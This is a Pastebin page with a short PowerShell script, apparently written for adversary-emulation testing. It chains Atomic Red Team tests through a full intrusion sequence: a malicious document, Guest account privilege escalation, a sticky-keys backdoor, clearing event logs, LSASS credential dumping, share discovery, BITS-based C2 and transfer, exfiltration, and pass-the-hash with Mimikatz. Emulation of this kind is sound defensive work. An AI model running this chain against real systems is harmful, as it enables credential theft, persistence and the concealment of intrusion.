API tools faq
paste
jessemoore

AtomicTest-AttackChain

jessemoore
Sep 26th, 2020 (edited)
193
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 0.93 KB | None | 0 0
raw download clone embed print report
  1. #Atomic Chain
  2. # https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/Indexes/Matrices/windows-matrix.md
  3. #
  4. #
  5. # MalDoc
  6. Invoke-AtomicTest T1204.002 -TestNumbers 3 -ShowDetailsBrief
  7. #
  8. #Enable Guest and add to Administrators group w/RDP capability
  9. Invoke-AtomicTest T1078.001 -ShowDetailsBrief
  10. #
  11. #Add cmd.exe to sethc sticky keys
  12. Invoke-AtomicTest T1546.008 -PromptForInputArgs
  13. #
  14. #Evasion T1070.001 - Clear Windows Event Logs
  15. Invoke-AtomicTest T1070.001 -TestNumbers 2
  16. #
  17. #Dump LSASS
  18. Invoke-AtomicTest T1003.001 -TestNumbers 2 -CheckPrereqs
  19. #
  20. #Look for Network Shares
  21. Invoke-AtomicTest T1135 -TestNumbers 3  -ShowDetails
  22. #
  23. #See what shares are available
  24. Invoke-AtomicTest T1135 -TestNumbers 4
  25. #
  26. #Transfer file or execute C2
  27. Invoke-AtomicTest T1197 -TestNumbers 2
  28. #
  29. #Exfil file
  30. Invoke-AtomicTest T1020 -ShowDetailsBrief
  31. #
  32. #Pass the Hash with Mimikatz
  33. Invoke-AtomicTest T1550.002 -TestNumbers 1 -PromptForInputArgs
  34.  
  35.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!